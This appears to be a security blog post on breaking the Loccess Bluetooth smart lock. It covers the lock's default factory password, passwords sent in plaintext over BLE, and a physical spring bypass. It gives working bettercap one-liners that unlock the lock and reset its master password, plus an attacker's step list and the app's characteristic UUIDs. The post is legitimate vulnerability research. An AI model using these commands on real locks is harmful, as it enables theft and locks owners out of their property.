Loccess smart lock is promoted as being a lock to be used in luggage, bicycles and lockers. Besides opening with a keypad on the bottom of the device, this smart lock is able to be opened with your smart phone using BLE.
I was able to get this smart lock at Amazon for around $20.
I installed the Android app and after reading the installation manual it seems that the factory code for opening the lock is 000000.
So to make things different I opened the Loccess by default and just by using bettercap (the short manual doesn't tell the user to change the password or even force it on the mobile app):
It JustWorks! By pure luck the first writable characteristic (handle 0x000e) gives us the open sesame operation.
One thing I need to mention is that the Loccess has a wake-up button. You need to press it so it can advertise - but if you think about it, if a malicious user wants to steal something he should be close to the device so, just pressing a button would not be a problem.
What happens if an user changes the default password? I changed it to a strong password (not) - 123456.
Before doing the sniffing, I tried again entering the factory password - just to see if it had a key to rule them all but it didn't work.
Ubertooth caught something interesting. When the victim opens the lock, the following request is caught in plaintext:
Look at the new password. If we update our request and send it to bettercap it will open Loccess. You can use an oneliner for that:
sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6ea400002b5a3f393e0a9e50e24dcca9e 313233343536;sleep 2;q"
You can even sniff the authentication from the admin:
0x0014 handle deals with the login username/password:
After getting this access, you can change the button 4 digit pincode, master password and reset to factory values.
Forcing the requests without the login/password will not work.
If the attacker gains the login/password combo and change master lock and button pincode, I don't know where the victim could open the lock again (without breaking it).
Taking from the last pcap from Wireshark, lets PoC with bettercap and change the master password to 666666:
sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400004b5a3f393e0a9e50e24dcca9e xxxxxxxx33000000000531323334353600000006;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400005b5a3f393e0a9e50e24dcca9e 363636363636;sleep 2;q"
From an attacker's point of view:
- Press the wake-up button
- Send an BLE request for the factory password
- If not working, attacker should sniff the traffic between victims phone and Loccess
- Use the new password (or change the existing one) and open the lock
Regarding the mobile app from Loccess, its quite simple and doesn't have a lot of unnecessary code.
First the permissions from the mobile app:
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.BLUETOOTH" /> <uses-permission android:name="android.permission.BLUETOOTH_PRIVILEGED" /> <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.VIBRATE" />
On com.loccess.utils.Constants you have all the characteristics UUIDs you need:
public static String LOCK_CHARACTERISTIC_BATTERY = "6E400008-B5A3-F393-E0A9-E50E24DCCA9E"; public static String LOCK_CHARACTERISTIC_KEYBOARD_PWD = "6E400009-B5A3-F393-E0A9-E50E24DCCA9E"; public static String LOCK_CHARACTERISTIC_LOGIN = "6E400004-B5A3-F393-E0A9-E50E24DCCA9E"; public static String LOCK_CHARACTERISTIC_MODIFY_PASSWORD = "6E400005-B5A3-F393-E0A9-E50E24DCCA9E"; public static String LOCK_CHARACTERISTIC_REGISTER = "6E400003-B5A3-F393-E0A9-E50E24DCCA9E"; public static String LOCK_CHARACTERISTIC_UNLOCK = "6E400002-B5A3-F393-E0A9-E50E24DCCA9E";
No requests are made to outside and the data is being stored locally:
private static final String DB_NAME = "lockdevice.db"; (...) private static final String TABLE_CREATE = "create table tbl_lockdevice ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, address TEXT UNIQUE, password TEXT, battery INTEGER DEFAULT 0, warning INTEGER DEFAULT 1, ring INTEGER DEFAULT 0, read_lock_status INTEGER DEFAULT 0, auto_unlock INTEGER DEFAULT 0 )";
Like the other lock that I already tested at my personal blog - where I opened the fingerprint lock by directly powering the rotor - I wanted to do something similar.
The lock itself don't seem so robust and seems to have a small spring that I was able to see on the FCCID internal photos.
If I can move that spring, I will be able to open the lock. So I grabbed my Kudu knife and... check out the following video:
In conclusion, I had lot of fun playing with this smart lock and its around the limit budget to be on eyeohtee.cheap :)
Sponsored by: Char49